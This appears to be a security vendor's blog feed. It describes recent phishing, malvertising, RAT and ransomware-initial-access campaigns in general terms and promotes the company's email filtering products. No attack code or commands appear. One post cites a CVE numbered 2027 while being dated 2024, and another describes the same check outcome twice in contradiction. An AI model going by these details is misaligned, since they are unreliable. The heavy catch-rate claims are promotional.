While cybersecurity professionals have predicted that AI-generated phishing emails could potentially be far more effective than human-generated emails, it is unclear how effective these AI-generated messages are at achieving the intended purpose – tricking the recipient into disclosing sensitive data such as login credentials, opening a malicious file, or taking some other action that satisfies the attacker’s nefarious aims.
A recently conducted study set out to explore how effective AI-generated spear phishing emails are at tricking humans compared to human-generated phishing attempts. The study confirmed that AI tools have made life much easier for cybercriminals by saving them a huge amount of time. Worryingly, these tools significantly improve click rates.
For the study, researchers from Harvard Kennedy School and Avant Research Group developed an AI-powered tool capable of automating spear phishing campaigns. Their AI agents were based on GPT-4o and Claude 3.5 Sonnet, which were used to crawl the web to identify information on individuals who could be targeted and to generate personalized phishing messages.
The bad news is that they achieved an astonishing 54% click-through rate (CTR) compared to a CTR of 12% for standard phishing emails. In a comparison with phishing emails generated by human phishing experts, a similar CTR was achieved with the human-generated phishing emails; however, the human version cost 30% more than the cost of the AI automation tools.
What made the phishing emails so effective was the level of personalization. Spear phishing is a far more effective strategy than standard phishing, but these attacks take a lot of time and effort. By using AI, the time taken to obtain the personal information needed for the phishing attempt and develop a lure relevant to the targeted individual was massively reduced. In the researchers’ campaign, the web was scraped for personal information and the targeted individuals were invited to participate in a project that aligned with their interests. They were then provided with a link to click for further information. In a genuine malicious campaign, the linked site would be used to deliver malware or capture credentials.
AI-generated phishing is a major cause of concern, but there is good news. AI tools can be used for malicious purposes, but they can also be used for defensive purposes and can identify the phishing content that humans struggle to identify. Security professionals should be concerned about AI-generated phishing, but email security solutions such as SpamTitan can give them peace of mind.
SpamTitan, TitanHQ’s cloud-based anti-spam service, has AI and machine learning capabilities that can identify human-generated and AI-generated phishing attempts, and email sandboxing for detecting zero-day malware threats. In recent independent tests, SpamTitan outperformed all other email security solutions and achieved a phishing and malware catch rate of 100%, a spam catch rate of 99.999%, with a 0.000% false positive rate. When combined with TitanHQ’s security awareness training platform and phishing simulator – SafeTitan, security teams will be able to sleep easily.
For more information about SpamTitan, SafeTitan, and other TitanHQ cybersecurity solutions for businesses and managed service providers, give the TitanHQ team a call. All TitanHQ solutions are available on a free trial and product demonstrations can be arranged on request.
by titanadmin | Jan 15, 2025 | Phishing & Email Spam, Security Awareness |
A scam has recently been identified that impersonates the CrowdStrike recruitment process and tricks recipients into downloading the XMRig cryptocurrency miner. Initial contact is made via email, with the email using CrowdStrike branding offering an Interview with the company.
The emails claim that the next phase of the hiring process is a 15-minute call with the hiring team; however, this year, the company is rolling out a new applicant and employee CRM app. The recipient is instructed to click the employee CRM application button, which triggers the download of a fake application for scheduling the interview. Recipients are given the option of downloading a Windows or MacOS version of the application; however, the downloaded file is an XMRig installer. When executed, checks are performed of the environment to determine if a debugger is attached to the process, the device is checked to ensure it has two cores and is suitable for cryptocurrency mining, and checks are performed to identify virtualization and running processes to prevent execution in a sandbox environment. If the checks are passed, a copy of XMRig is downloaded from GitHub and executed. If the checks are passed, the user is presented with an error message, advising them that the installation has failed, potentially due to a hardware compatibility issue. The user is told to try again by downloading the application on another device, potentially infecting a second device with XMRig.
Jobseekers are often targeted in phishing scams. In the hunt for a job, they can be susceptible to phishing attempts, forgetting their security awareness training in the hope of landing an exciting new position. Fraudsters often claim to be recruitment agents who have identified individuals for a lucrative job and may even claim that the job is theirs based on information found on professional networking sites or from headhunting activities. According to the Better Business Bureau, recruitment scams result in losses of around $2 billion each year, and these scams are becoming more common.
The scammers often seek personal information and usually require the payment of a nominal charge for job placement or training, or in this case, the goal is malware delivery. Initial contact may be made via email to a personal email address; however, this could easily result in malware being installed on a corporate-owned device. As with all phishing attempts, vigilance is key. Regardless of the subject of an email or the offer or threat contained therein, all emails should be subject to checks to assess the authenticity of the email.
For businesses, TitanHQ offers a comprehensive security awareness training platform for training workforce members on cybersecurity best practices and common threats. The platform includes hundreds of computer-based training modules covering all aspects of security. The training modules are no longer than 10 minutes, are enjoyable and engaging, and can be easily combined into training courses tailored for job roles or individuals. New content is frequently added in response to changing tactics, techniques, and procedures of threat actors to keep employees up to date on the threats they are likely to encounter.
The platform also includes a phishing simulator for assessing the effectiveness of training and identifying individuals who are susceptible to phishing attempts to ensure they receive the additional training they need. Through regular security awareness training and phishing simulations using the SafeTitan platform, businesses have been able to make measurable improvements to their human defenses, reducing susceptibility to phishing attempts by up to 80%. If you have yet to implement a security awareness training program or your employees are still falling for phishing attempts, give the TitanHQ team a call about the SafeTitan platform.
by titanadmin | Dec 31, 2024 | Phishing & Email Spam, Spam Software |
Various analyses indicate there has been a significant increase in phishing attacks in 2024, with one study revealing that 94% of organizations experienced at least one phishing attack in 2024, two percentage points higher than the previous year. The majority of those organizations suffered bad consequences as a result of those attacks.
Phishing attacks are not only increasing in volume, they are also increasing in sophistication and AI tools are making phishing attempts much harder to identify. AI tools are being used to slash the amount of time taken to conduct research for spear phishing attacks, including using these tools to create lures that the targeted individuals are likely to respond to. AI tools are being used to create grammatically perfect emails, even matching the writing style of the impersonated company or individual. There has also been an increase in multi-channel attacks, where phishers combine email, text messages, and the telephone in their scams.
In the United States, the Federal Bureau of Investigation’s Internet Crime Complaint Center publishes annual reports about complaints about cybercrime, with this year’s report showing almost 300,000 reports of phishing-related cybercrime, not including cyberattacks such as ransomware attacks that started with phishing emails. Across the Atlantic, in the UK it was a similar story, with the Information Commissioner’s Office also reporting and increase in complaints related to phishing.
With the increase in attacks, use of AI tools, and rising data breach costs, it is no surprise that phishing is one of the biggest causes of stress for cybersecurity professionals. With the New Year rapidly approaching, now is the perfect time to ease the stress by enhancing your defenses and strengthening your email security posture, and one of the best ways to do that is with an improved email security solution capable of identifying and blocking even sophisticated threats.
At TitanHQ, we are continuously making improvements to the engine at the heart of our antispam software (SpamTitan) and anti-phishing solution (PhishTitan) to improve detection and usability. The latest release is the most powerful yet with AI and machine learning capabilities and email sandboxing for exceptional malware detection. The engine has been shown to be highly effective in independent tests by the highly respected independent computer security company VirusBulletin.
VirusBulletin put the engine that powers the SpamTitan and PhishTitan solutions to the test along with 10 leading email security solutions and awarded it joint first place for overall score in the Q3, 2024 tests, and first place in the Q4,2024 tests. For the third consecutive quarter, TitanHQ achieved a 100% malware catch rate, and the phishing catch rate increased from 99.99% in Q2 to 100% in Q4, with a Q4 spam catch rate of 99.99% and a 0.00% false positive rate. The strong performance has earned TitanHQ its third consecutive VBSpam+ award. SpamTitan and PhishTitan are very competitively priced and it is easy to switch from alternative email security solutions. Given the amazing catch rates, ease of use, and competitive pricing, it should come as no surprise that record numbers of companies are making the switch to TitanHQ to improve their phishing defenses.
Technical defenses are important for blocking threats, but it is also important that your workforce is trained to recognize phishing and other security threats. The workforce needs to be provided with regular training sessions to reinforce security best practices and make them aware of the threats they are likely to encounter. Through regular training, you can develop a security culture and ensure that employees will be able to detect, avoid, and report any threats landing in their inboxes.
The easiest way to improve security awareness is with a comprehensive training platform such as SafeTitan. SafeTitan is an easy-to-use training platform with hundreds of training modules covering all aspects of security that is used by businesses to teach security best practices and raise awareness of common and not-so-common threats. Training courses can easily be created for different users, job roles, and threat levels, and the training can be automated to provide hands-off training continuously throughout the year. The platform can be configured to automate the delivery of relevant training in response to security errors, and the phishing simulator can be used to conduct internal campaigns to reinforce training and identify areas where training needs to be improved.
Why not get 2025 off to the perfect start by improving your phishing defenses with TitanHQ? Give the team a call today to discuss these solutions in more detail and take advantage of a free trial of these solutions to see for yourself the difference they make to your phishing defenses.
by titanadmin | Dec 30, 2024 | Phishing & Email Spam |
It used to be relatively easy to spot a phishing attempt. Phishing emails would have poor grammar and be littered with spelling mistakes, with relatively easy-to-identify lures such as too-good-to-be-true offers. The unsolicited emails would be sent from unknown email addresses in huge volumes, as threat actors knew they were good enough to fool enough recipients and make the campaigns worthwhile. Provided employees had a modicum of security awareness training and took time to carefully read emails, the phishing attempts could be easily identified and avoided.
Phishing has been growing in sophistication and while these poorly constructed emails are not exactly a thing of the past, there is now a new breed of phishing emails that are expertly written, contain no errors, and are highly personalized to maximize the probability of getting the desired response. In order to conduct a highly personalized spear phishing campaign, threat actors need to spend a considerable amount of time researching their intended targets. In order to warrant that amount of time, the potential rewards must be high. These campaigns are usually conducted on high-value targets such as C-suite members by well-resourced threat actors, such as state-sponsored hacking groups.
Advances in AI technology have made these highly targeted phishing campaigns much easier to conduct. AI tools greatly reduce the amount of human effort required and that has opened up these targeted campaigns to a much broader range of cybercriminals. AI tools can be used to craft perfect phishing emails that closely mimic the companies and brands they spoof, making identification difficult. AI tools are also being used to analyze online profiles to gather personal information to be included in phishing emails, massively reducing the time required to construct the perfect scam email.
AI tools can also be used to assess online interactions by a particular individual to find out topics the individual is likely to respond to. They can rapidly ingest large amounts of data to craft phishing lures closely mimicking the style of emails written by a particular company or individual, making the spoofing almost impossible for individuals to distinguish from genuine communications. With the tools to gather a wealth of personal information and create flawless emails on appropriate topics, business email compromise scams have become much easier and can be conducted by a broader range of cybercriminals. The consequences of falling for one of these scams can be severe.
To combat these advanced phishing campaigns, businesses need advanced defenses. It is important to ensure that all members of the workforce receive ongoing security awareness training, including the C-suite as they are often the people being targeted in these campaigns. However, given the quality of these phishing attempts, security awareness training and a standard spam filter appliance will not cut it. For many years, spam filters have relied on blacklists of IP addresses and domains that have been previously identified as malicious or have low trust scores, along with antivirus engines for malware detection, and scans of message content for phrases commonly associated with spam and phishing. These spam filters will catch the majority of spam and bulk phishing emails, but will not detect the more sophisticated, AI-generated threats.
Advanced email security solutions are now a necessity. The latest anti-spam software and cloud based anti-spam services incorporate AI and machine learning-based detection in addition to the standard spam filtering methods, such as the engine at the heart of TitanHQ’s SpamTitan and PhishTitan M365 anti-phishing solutions. In recent independent tests by VirusBulletin, TitanHQ’s SpamTitan Skellig engine scored joint first place for detection in the Q3, 2024 tests and first place in Q4, achieving a 100% phishing detection rate with a 0.00% false positive rate and a 100% malware catch rate. Whether you are a business looking to improve your defenses or a managed service provider looking to provide more advanced security to your clients, give the TitanHQ team a call to find out more about getting the right tools in place to counter these advanced phishing threats.
by titanadmin | Dec 29, 2024 | Phishing & Email Spam, Spam Software |
Detections of the Remcos remote access trojan (RAT) have increased recently with threat actors adopting new tactics to deliver this popular commercially available malware. The Remcos RAT is offered under the malware-as-a-service model, where purchasers can use the malware to remotely control infected devices and steal sensitive data.
The Remcos RAT is primarily delivered via phishing emails with malicious attachments, with each of the two main variants delivered using distinct methods. One of the variants is distributed in phishing emails using Microsoft Office open XML attachments that exploit a Microsoft Office memory corruption remote code execution vulnerability (CVE-2027-11882) to execute an embedded script that downloads an intermediate payload that will in turn deliver the Remcos RAT. The vulnerability does not affect newer Office versions, such as Microsoft 365, only older versions prior to Office 2016.
Lures commonly used include fake purchase orders, where the email claims to include purchasing specifications in the attached Excel file. If opened, the spreadsheet is blurred and the user is told the document is protected, and to enable editing to view the file. In the background, the vulnerability is exploited to deliver and execute an HTA file, triggering the processes that lead to the installation of the Remcos RAT. When delivered, the Remocos RAT is injected into a legitimate Windows executable (RegAsm.exe).
The second variant uses a VBS attachment with an obfuscated PowerShell script to download files from a remote server and inject code into RegAsm.exe. Since the final payload is injected into legitimate Windows processes, the malware is often not detected by security solutions. Once installed, persistence is maintained via registry modifications to ensure the malware remains active after a reboot. Lures used to deliver this variant include payment confirmations, with details included in the attached DOCX file.
The highest number of infections have occurred in the United States and India, and there has been a sharp rise in infections in recent months showing that the campaigns are proving effective. A combination of technical measures and security awareness training will help to prevent Remcos RAT infections. Phishing campaigns such as this show why it is important to stay on top of patching and ensure that all systems are kept up to date, and to migrate from software that has reached end-of-life to supported software versions. Endpoint security software is important; however, detection of the Remcos RAT can be difficult since files are not written to the hard drive.
The primary defense is an advanced email security solution. SpamTitan, TitanHQ’s spam filtering service, is an ideal choice as it includes reputation checks, SPF, DKIM, & DMARC, machine-learning algorithms to identify anomalies in emails, and email sandboxing, where attachments are sent for extensive analysis including pattern filtering. In recent tests by VirusBulletin, the engine that powers SpamTitan scored highest out of all 11 tested email security solutions, with a 100% malware and phishing catch rate.
It is important to keep the workforce up to date on the latest security threats and to teach and reinforce security best practices. The SafeTitan security awareness training platform makes this easy for businesses and MSPs, allowing effective security awareness training programs to be created that are tailored to individuals and user roles. The training can be automated to be delivered regularly to employees, as can phishing simulations using the SafeTitan phishing simulator to test the effectiveness of training. Businesses with Microsoft 365 would benefit from the PhishTitan platform. Based on the same engine that powers SpamTitan, PhishTitan helps to protect Microsoft 365 environments from the advanced threats that Microsoft fails to block, add banners to emails from external sources and helps security teams rapidly mitigate phishing threats.
by titanadmin | Dec 28, 2024 | Phishing & Email Spam |
An ongoing large-scale phishing campaign targets European businesses and attempts to obtain credentials for their Microsoft Azure cloud infrastructure. While businesses in multiple sectors have been attacked, the majority are in the automotive, chemical, and industrial manufacturing sectors. According to an analysis of the campaign by the Unit 42 team, this campaign has targeted at least 20,000 businesses in Europe.
Like many current phishing campaigns targeting companies, the campaign uses DocuSign-themed lures, where the user is asked to review an emailed document, which includes the branding of the company being targeted. If the document is opened, the user is directed via embedded hyperlinks to an online form created using HubSpot’s free online form builder tool. The drag-and-drop form builder allows forms to be created quickly, and in this case, the threat actor has used the free-to-use tool to create a form with a link button to view the document on Microsoft’s secured cloud.
If the button is clicked, the user will be directed to a phishing page that mimics the Office 365 Outlook Web App login page. If credentials are entered in the fake login page – commonly hosted on attacker-controlled .buzz domains – they are captured by the threat actor, who will attempt to login, and then pivot and move laterally to the cloud. A successful login will see the threat actor add a new device to the victim’s account for persistence.
There are several measures that can be taken by businesses to protect against phishing campaigns such as this, starting with an email spam filter to block the initial contact via email. SpamTitan is an advanced cloud-based anti-spam service for blocking email phishing and malware threats. The solution checks inbound messages against up-to-the-minute lists of blacklisted domains, performs SPF, DKIM, and DMARC checks, malware scans, assessments of message headers and content for phishing indicators, and incorporates AI and machine learning algorithms to identify anomalies in message content. Email sandboxing is used to subject messages to in-depth analysis to identify zero day threats. In recent independent testing by VirusBulletin, SpamTitan achieved first place for overall score out of 11 leading email security solutions, blocking 100% of phishing attempts, 100% of malware, and 99.998% of spam email, with a 0.00% false positive rate.
Security awareness training is vital to teach security best practices and make employees aware of threats, including email threats that abuse legitimate services and tools. TitanHQ’s SafeTitan platform allows businesses to quickly create and automate security awareness training programs, tailored for departments, user groups, and individuals, and reinforce training through phishing simulations. An additional recommended protection is the WebTitan DNS-based web filter, which incorporates URL filtering to prevent users from visiting known malicious websites, incorporating controls to prevent users from downloading malware.
For more information on improving your defenses against phishing, give the TitanHQ team a call today. The full TitanHQ suite of cybersecurity solutions is available on a free trial, with full product support provided throughout the trial.
by titanadmin | Dec 28, 2024 | Phishing & Email Spam |
Companies in multiple sectors are being targeted in an ongoing phishing campaign involving initial contact via email via Google Calendar-generated meeting invites. This campaign has proven effective, especially when the user recognizes other guests. The campaign has been active throughout December, with at least 1,000 of these phishing emails identified each week, according to Check Point.
The aim of the phishing emails is to trick the recipients into clicking a link in the email or opening a Calendar file attachment (.ics), both of which will send the user to either Google Forms or Google Drawings. Next, the user is tricked into clicking another link, which could be a support button or a fake reCAPTCHA. A click will drive the user to the scam page, where they will be taken through a fake authentication process that captures personal information, and ultimately payment card information. This campaign could easily be adapted to obtain credentials rather than payment card details, and campaigns in the past that abused Google Calendar have targeted credentials.
An attacker only needs to obtain an individual’s email address to send the calendar invite, and the emails look exactly like a genuine invite for a meeting. Since the legitimate Google Calendar service is used to generate the phishing invites, the emails are generally not blocked by spam filtering services. Since the sender is legitimate and trusted, the emails pass SPF, DKIM, and DMARC checks, guaranteeing delivery.
Depending on the user’s settings, these may be automatically added to the user’s calendar. The threat actor can then trigger a second email by canceling the meeting and has been doing so in this campaign. The cancellation email also includes a hyperlink to a malicious website.
The use of Google Calendar invites in phishing is nothing new. It is effective as it ensures a large number of requests land in inboxes, and Google Calendar will be familiar to most people, considering there are more than 500 million active users of the tool.
There are simple steps to take to block these threats, although the first option will also limit legitimate functionality for genuine invites. To block these attempts, go into Google Calander settings, and in the event settings switch from automatically add invitations to only show invitations I have responded to. Also, access Gmail settings and uncheck automatically add events from Gmail to my calendar. To avoid disabling the functionality, check the only known individuals setting in Google Calendar, which will generate an alert if the user has had no interactions with an individual in the past.
It is important to have an advanced email security solution that is capable of detecting sophisticated phishing attacks that bypass the standard reputation checks that are present in virtually all spam filtering software – SPF, DKIM, and DMARC. Advanced spam filtering solutions incorporate AI and machine learning capabilities and can detect anomalies in inbound emails and flag them as suspicious or send them for deeper inspection in an email sandbox. In the sandbox, the message can be analyzed for malicious content, including following the link to check the destination URL. While this campaign does not use malware, an email filtering service with email sandboxing will also protect against malware threats.
Meeting invites, calendar invites, and collaboration requests are commonly used in phishing campaigns and are sent from trusted domains that often bypass spam filtering controls, so it is important to cover these types of scam emails in security awareness training. Employees should be made aware that these requests may not be what they seem, even if they have been sent via a legitimate service. Businesses can also gauge how susceptible employees are to these types of scams using a phishing simulator. SafeTitan includes many phishing templates involving invites from legitimate services to allow businesses to incorporate these into their simulations.
Call TitanHQ today for more information on improving your defenses against phishing with the SafeTitan security awareness training platform, SpamTitan email security, and the PhishTitan anti-phishing solution for Microsoft 365.
by titanadmin | Dec 27, 2024 | Internet Security |
An ongoing malvertising campaign is proving effective at distributing a dangerous information stealer malware called Lumma Stealer using fake CAPTCHA prompts that appear when users browse the web.
Lumma Stealer is offered under the malware-as-a-service model, where cybercriminals can pay to use the malware rather than having to develop their own. The malware has extensive stealing capabilities and will obtain browsing histories, passwords, and cryptocurrency wallet details. That information is then sent to the attacker’s command and control server and is abused directly or sold on. The fake CAPTCHA pages generated in this malvertising campaign will be familiar to web users, as they are present on many websites, even Google uses them to verify that a user is a human rather than a bot. In this case, the fake CAPTCHA uses images rather than text, which the user must click based on the prompt. The user is told to click on images of legitimate advertisements and after selecting the advertisements and clicking verify, they will be tricked into executing a PowerShell command that will deliver Lumma Stealer from a remote server.
A variety of popup ads are used in this campaign to appeal to a broad audience, including streaming services, software sites, and fake offers, all designed to attract a click. Code embedded in the ad will perform a check to determine if the user is a person, and if that check is passed, the fake CAPTCHA is displayed. The CAPTCHA page includes JavaScript that silently copies a one-line PowerShell command to the clipboard.
As part of the verification check, the user will be presented with a Verification Steps pop-up that instructs them to press the Windows button + the R key, then press CTRL + V, and then press enter on their keyboard. Anyone with a reasonable knowledge of computers will be aware that the first step will launch the Windows Run Dialog box which is used to quickly run programs. CTRL + V is a keyboard shortcut for pasting, and enter will run that pasted command. Since JavaScript has added the PowerShell command to the clipboard, following those steps will run the PowerShell command and trigger the download and execution of Lumma Stealer.
Malvertising campaigns involve adding malicious adverts to third-party ad networks, which are used by a huge number of legitimate websites for generating additional revenue. Advertisers pay to have their adverts displayed on any website that has the ad network’s code. Many high-traffic legitimate sites such as media sites use these adverts, so the advertisers can reach a huge number of people. This campaign, which was analyzed by Guardio Labs/Infoblox, was linked to a single ad network – Monetag. The advantage of that ad network is it allows pop-ups to be displayed, and code can be incorporated to allow those pop-ups to be displayed even if the user has an ad blocker. All ad networks have moderation processes to verify that the ads being displayed are legitimate and not malicious; however, the threat actor has cleverly managed to circumvent moderation processes, thus ensuring their ads get millions of impressions.
Anyone browsing the web will have seen adverts displayed through ad networks, and avoiding these ads online is virtually impossible. As this campaign shows, even ad blockers are not always effective. To combat malvertising, businesses should ensure that they cover this tactic in their security awareness training content. Employees should be made aware of the threat and be told never to click on ads, popups, nor to execute any commands when prompted to do so on a website or by an ad.
Creating new training content is easy with the SafeTitan security awareness training platform from TitanHQ. The platform has a huge number of training modules, allowing businesses to easily create custom training programs for different roles, based on the types of threats they are likely to encounter, including malvertising threats.
A web filter is also strongly recommended for blocking access to malicious websites and controlling the sites that users can access, in particular sites offering pirated software as the ad networks used by these sites tend to have fewer controls on the advertisers that can use them, increasing the chance of malicious adverts being displayed.
by titanadmin | Dec 23, 2024 | Industry News, Spam Software |
TitanHQ’s email security solutions achieved first place in Q4 performance tests by the leading security information portal, testing, and certification body, VirusBulletin. The security engine that powers TitanHQ’s SpamTitan email security and PhishTitan anti-phishing platform for Microsoft 365 was put to the test alongside 10 other market-leading email security solutions and achieved the highest overall score out of all 11 solutions, building on the joint 1st overall score in the Q3, 2024 round of tests, 2nd position in the Q3 tests, and 3rd position in the Q1, 2024 tests.
The top position was achieved with a 100% phishing catch rate, a 100% malware catch rate, and a 0.00% false positive rate. This was the third consecutive quarter that TitanHQ’s solutions had a perfect score for catching malware and the third consecutive quarter that TitanHQ has been awarded the VBSpam+ award for outstanding performance. “We are thrilled to have significantly outperformed our main competitors and surpassed the industry average,” said TitanHQ CEO, Ronan Kavanagh. “Our unwavering commitment to providing unmatched email security is evident in these results, and we remain dedicated to protecting our clients from evolving cyber threats.”
Over the past two decades, VirusBulletin has tested, reviewed, and benchmarked enterprise-level security solutions to determine how effective the solutions are at blocking real-world threats. VirusBulletin has a formidable reputation for providing businesses with invaluable independent intelligence about the rapidly evolving threat landscape, and businesses look to performance tests when selecting security solutions to make sure they perform as well as the vendors’ claim. For the Q4, 2024 tests of enterprise-level anti-spam software, TitanHQ’s cloud-based anti-spam service was put to the test alongside solutions from Bitdefender, Fortinet, Mimecast, N-able, Sophos, Rspamd, SEPPmail, Net at Work, and Zoho. The tests ran for 16 days in November 2024 and included evaluations of almost 107,000 emails, of which 105,228 were spam and 1,315 were legitimate emails. 1,045 of the emails contained a malicious attachment and 16,825 contained a link to a web page hosting phishing content or malware.
Virus Bulletin Q4, 2024 Test Scores
| Metric |
TitanHQ Score |
| Malware catch rate |
100.000% |
| Phishing catch rate |
100.000% |
| Spam Catch (SC) rate |
99.999% |
| Project Honey Pot SC rate |
99.998% |
| MXMailData SC rate |
100.000% |
| Abusix SC rate |
99.999% |
| False Positive (FP) Rate |
0.000% |
| Newsletters FP rate |
0.0% |
| Final Score |
99.999% |
“With only two spam samples missed – one of which was from the unwanted category – no false positives of any kind, and a final score value of 99.999, SpamTitan showed the best performance in this test, ranking top for final score,” explained VirusBulletin. “Needless to say, a well-deserved VBSpam+ certification is awarded.”
Virus Bulletin 2024 Test Scores
| Test Period |
Phishing catch Rate |
Malware Catch Rate |
Spam Catch Rate |
Position |
| Q1 |
99.91% |
99.95% |
99.98% |
3rd |
| Q2 |
99.99% |
100% |
99.98% |
2nd |
| Q3 |
99.98% |
100% |
99.98% |
1st (Joint) |
| Q4 |
100% |
100% |
99.99% |
1st |
The test results confirm that TitanHQ is a leading enterprise spam filter provider; however. TitanHQ’s spam filtering service and anti-phishing solution for M365 are suitable for use by businesses of all sizes. While incredibly powerful and feature-rich, they are easy to implement and use. The solutions have also been developed from the ground up to meet the needs of MSPs to help them better protect their clients from rapidly evolving threats. “We’ve seen a remarkable influx of new MSP customers migrating from other solutions, consistently highlighting TitanHQ’s ability to deliver immediate and substantial threat mitigation,” said Kavanagh.
If you want industry-leading email protection from spam, phishing, and malware, give the TitanHQ team a call today to find out more about getting started with SpamTitan and PhishTitan. Product demonstrations can be arranged on request and all TitanHQ solutions are available on a free trial.
by titanadmin | Dec 18, 2024 | Industry News, Spam Software |
TitanHQ has announced that the latest version of SpamTitan (Skellig 9.07) has been launched, offering significant enhancements to improve detection, usability, and overall security. The new version of SpamTitan Skellig builds on previous versions that have been demonstrated to provide exceptional protection against malware, phishing, and spam, as evidenced by recent independent tests by VirusBulletin.
In Q3, 2024, SpamTitan achieved joint first place for overall score in the phishing, spam, and malware detection tests, and in Q4, 2024, performed even better beating all other industry-leading competitors to achieve the top spot with an overall score of 99.999%, including a malware and phishing catch rate of 100%, a spam catch rate of 99.999%, and a false positive rate of 0.000%, earning SpamTitan its third consecutive VPSpam+ award.
The latest release of the SpamTitan Skellig engine includes numerous security updates, including significant improvements with enhanced Domain and Display Name anti-spoofing protection and updated anti-spoofing screens. The settings for Domain and Display Name anti-spoofing have been separated to make it easier to see which features have been enabled and the update makes MSP’s lives easier as these split options are available at the customer level, so there is no need to drill down to each domain-level setting. The update will reduce the time that needs to be spent managing security defenses. Further, the update provides greater flexibility and control for inbox protection, since Display Name anti-spoofing is independent of user policies. That means it is possible to upload a custom list of Display Name/email pairs for more targeted protection. To improve usability, changes have also been made under the cover for Quarantine Reports to ensure they are delivered more reliably and on-time
TitanHQ is committed to making continuous security improvements to improve detection and simplify security management to make its products easier and less time-consuming to use, ensuring users have complete control of how protections are applied. The new version will be updated automatically for current users, and if you are yet to try our spam filtering service, give the TitanHQ team today for help getting you started with a free trial.
by titanadmin | Dec 16, 2024 | Phishing & Email Spam |
A new phishing campaign has been identified that uses the novel tactic of attaching corrupted Microsoft Word files to emails. The files themselves do not contain any malicious code, so scans of the attachments by email security solutions may not flag the emails as malicious.
In order to get the recipient to open the email, the threat actor impersonates the HR department or payroll team, as employees will typically open these messages. The attached files have file names related to payments, annual benefits, and bonuses, which employees may open without performing standard checks of the email, such as identifying the true sender of the message. Many employees place a moderate amount of trust in Word files, as if they contain a macro, it should not run automatically if the Word document is opened.
The threat actor relies on the employee’s curiosity to open the file and the way that operating systems handle corrupted files. The file recovery feature of Microsoft Word will attempt to recover corrupted files. The user will be informed that parts of the file contain unreadable content, and the user is prompted to confirm if they would like the file to be recovered. The documents have been crafted to ensure that they can be recovered by Word, and the recovery will present the user with a QR code that they are told they must scan to retrieve the document.
The document includes the logo of the company being targeted, and the user does not need to “enable editing” to view the contents of the document, so they may mistakenly believe they are safe. If they scan the QR code using their mobile device, they will be directed to a phishing page where they are asked to enter their Microsoft credentials on a phishing page that is an exact match of the genuine Microsoft login prompt.
Businesses with spam filter software may not be protected as email security solutions often fail to scan corrupted files. For instance, the phishing emails bypass Outlook spam filters according to the researchers at Any.Run who identified the campaign. That means the emails may be delivered to inboxes, especially as the messages do not contain any content in the body of the email indicative of a phishing attempt.
If the user opens the file and scans the QR code, they will switch from their desktop or laptop to their mobile phone. Mobile devices rarely have the same level of security protection, so corporate anti-phishing controls such as web filters will likely be bypassed.
Threat actors are constantly developing new ways to trick employees in their phishing campaigns, which is why it is important to run security awareness training programs continuously, updating the training content with new training material in response to threat actors’ changing tactics. By warning employees about this method, they should recognize the scam for what it is if they receive an email with a corrupted file attachment. That is easy to do with a security awareness training platform such as SafeTitan. New training content can be quickly created and rolled out to all users as part of their monthly allocation of training modules. It is also easy to add this type of threat to the SafeTitan phishing simulator to test how employees respond to this new threat type.
As the researchers demonstrated, Microsoft fails to detect the threat, demonstrating why it is important to bolster your M365 phishing defenses with a third-party solution, such as PhishTitan from TitanHQ. PhishTitan integrates seamlessly with Microsoft 365 to augment protection and catches the phishing threats that Microsoft misses. PhishTitan will also add a banner to all inbound emails that come from external sources, giving users a clear flag that these emails are not genuine. The HR department and payroll have internal email addresses.
An email security solution with email sandboxing is also advisable for deep inspection of file attachments, including the ability to read QR codes. Spam filters for incoming mail should also have machine learning and AI-based detection capabilities for identifying emails that deviate from the messages typically received by the business.
All of these features are part of TitanHQ’s email security suite. Give the team a call today to find out more.
by titanadmin | Dec 12, 2024 | Network Security, Security Awareness |
In this post, we explore some of the tactics used by the Black Basta ransomware group to gain initial access to victims’ networks. Black Basta is a ransomware-as-a-service (RaaS) group that first appeared in April 2022. After gaining access to victims’ networks, the group escalates privileges and moves laterally within the network, identifying sensitive data and exfiltrating files before running its encryption processes. The group then drops a ransomware note and demands payment to prevent the publication of the stolen data and to obtain the keys to decrypt the encrypted files. The group targets multiple industry sectors including healthcare organizations, primarily in North America, Europe, and Australia.
The group’s tactics are constantly evolving; however, one of the most common tactics used for initial access is email phishing, either by sending an email with a hyperlink to a malicious website or an infected email attachment. The group’s phishing campaigns aim to deliver Qakbot malware, which is used to provide persistent access to victims’ networks (via autorun entries and scheduled tasks), and for running PowerShell scripts to disable security solutions. The malware is then used to deliver additional malicious payloads such as Cobalt Strike, and legitimate software tools such as Splashtop, Mimikatz, and Screen Connect.
Recently, the group has been observed using a new tactic called email bombing as an alternative way of gaining initial access to networks. With email bombing, the selected targets’ email addresses are sent large volumes of spam emails, often by signing the user up to multiple mailing lists or spamming services simultaneously. After receiving a large volume of spam emails, the user is prepared for the next stage of the attack.
The threat actor reaches out to the user, often via Microsoft Teams or over the phone, and impersonates a member of the IT help desk. The threat actor claims they have identified a problem with spam email and tells the user that they need to download a remote management tool to resolve the issue.
If the user agrees, they are talked through downloading one of several tools such as QuickAssist, AnyDesk, TeamViewer, or ScreenConnect. The threat actor then uses that tool to remotely access the user’s device. These tools may be downloaded directly from the legitimate vendor’s domain; however, since many businesses have controls in place to prevent the installation of unauthorized remote access tools, the installation executable file may be downloaded from SharePoint. Once installed, the threat actor will use the remote access to deliver a range of payloads.
Email bombing is a highly effective tactic as it creates a need to have an issue resolved. Once on the phone or in conversation via Microsoft Teams, the threat actor is able to try other methods for installing the remote access tools if they fail due to the user’s security settings.
Email bombing may be used by multiple threat actors for initial access, and phishing remains the most common method for gaining a foothold in networks for follow-on attacks. Implementing defenses against these tactics will significantly improve your defenses and make it harder for threat actors to breach your network.
An Advanced Spam Filter
An advanced spam filter is a must, as it can identify and block phishing attempts and reduce the effectiveness of email bombing. Next-gen spam filtering software incorporates AI and machine learning algorithms to thoroughly assess inbound emails, checking how they deviate from the emails typically received by the business, and helping to flag anomalies that could indicate novel phishing attempts.
A spam filter should also incorporate email sandboxing in addition to antivirus software protection, as the latter can only detect known threats. Novel malware variants and obfuscated malware are often missed by antivirus software, so a sandbox is key to blocking malware threats. After passing initial checks, an email is sent to the email sandboxing service for deep analysis, where behavior is checked for malicious actions, such as attempted C2 communications and malware downloads.
SpamTitan incorporates machine learning algorithms, sandboxing, and link scanning to provide advanced protection against phishing and malware attacks. SpamTitan was recently rated the most effective spam filter in recent independent tests by VirusBulletin, blocking 100% of phishing emails, 100% of malware, and 99.99% of spam emails, giving the solution the highest overall score out of all 11 spam filtering services put to the test.
Security Awareness Training
